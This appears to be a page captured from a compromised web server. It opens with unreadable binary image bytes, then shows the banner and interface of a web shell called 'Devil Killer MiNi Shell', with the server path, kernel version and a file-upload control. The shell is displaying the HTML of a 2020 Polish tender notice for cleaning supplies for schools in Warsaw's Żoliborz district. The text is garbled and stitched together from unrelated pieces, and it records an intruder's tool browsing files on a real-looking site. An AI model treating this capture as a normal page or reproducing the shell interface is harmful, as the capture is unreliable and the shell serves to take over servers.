JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200210/511040-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 511040-N-2020 z dnia 2020-02-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Dzielnicowe Biuro Finansów Oświaty Żoliborz m.st. Warszawy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa artykułów i środków czystości na potrzeby placówek oświatowych Dzielnicy Żoliborz m.st. Warszawy</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Dzielnicowe Biuro Finansów Oświaty Żoliborz m.st. Warszawy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">16339915000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Ul. Felińskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">15</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01-513</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">22 839 89 81</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ejagielska@dbfo.internetdsl.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">22 839 12 35</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://www.dbfozoliborz.waw.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://www.dbfozoliborz.waw.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.dbfozoliborz.waw.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23.11.2012 r. – Prawo pocztowe (Dz.U. z 2012 r poz. 1529 z późn. zm.), osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Dzielnicowe Biuro Finansów Oświaty Żoliborz m. st. Warszawy przy ul. Felińskiego 15 (wejście od ul. Bitwy pod Rokitną), 01-513 Warszawa</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa artykułów i środków czystości na potrzeby placówek oświatowych Dzielnicy Żoliborz m.st. Warszawy</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">DBFO.EJ.2411.3.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest dostawa artykułów i środków czystości na potrzeby placówek oświatowych Dzielnicy Żoliborz m.st. Warszawy, podzielona na trzy części (w proporcji: 50% + 25% +25%) i szczegółowo rozpisana w formularzach cenowych, stanowiących załącznik nr 1b i 1c do SIWZ oraz we wzorze umowy, stanowiącym Załącznik nr 7 do SIWZ. Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć ofertę zarówno na pojedyncze zadanie lub na całość przedmiotu zamówienia. Oferta częściowa musi obejmować wszystkie pozycje określone w danej części. Oferta częściowa musi obejmować minimum jedną z poniższych części: Część 1: Środki czystości i artykuły do sprzątania, Część 2: Papier toaletowy i ręczniki papierowe. Szczegółowy wykaz produktów dla poszczególnych części zamówienia stanowią załączniki nr 1b oraz 1c do SIWZ. Zamawiający informuje, że oferta która nie będzie zawierała pełnego zakresu przedmiotu zmówienia dla danej części, bądź nie będzie odpowiadała opisowi przedmiotu zamówienia, zostanie odrzucona jako nieodpowiadająca treści SIWZ na podstawie art. 89 ust. 2 ustawy Pzp. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39800000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39224000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33760000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">441476,93</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-11-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1. Przedmiot zamówienia zostanie zrealizowany w trzech dostawach.2. Dostawy będą następować w następujących okresach:(1) pomiędzy 16 a 31 marca 2020 roku (50% artykułów i środków czystości);(2) pomiędzy 01 a 15 czerwca 2020 roku (25% artykułów i środków czystości);(3) pomiędzy 01 a 15 października 2020 roku (25% artykułów i środków czystości).3. Każdorazowo przed okresem dostawy określonym w pkt 2 Zamawiający zobowiązuje się określić rodzaje i ilości poszczególnych artykułów i środków czystości składających się na daną dostawę.4. Ostatnia dostawa musi nastąpić najpóźniej w dniu 30 listopada 2020 roku pod rygorem odstąpienia Zamawiającego od umowy. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie dostawy środków czystości lub artykułów gospodarczych oraz załączy dowody określające czy te dostawy zostały wykonane lub są wykonywane należycie. Wartość każdej dostawy winna być nie mniejsza niż: dla części nr 1 i 2 - 200.000,- zł brutto każda (dwieście tysięcy złotych). </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp; 2) oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej zgodnie ze wzorem wskazanym w załączniku nr 4 do SIWZ. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, dostaw środków czystości lub artykułów gospodarczych, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy te zostały wykonane wraz z dowodami określającymi czy dostawy te zostały wykonane lub są wykonywane należycie, według wzoru określonego w załączniku nr 5 do SIWZ; przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzając ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego dla przedmiotu 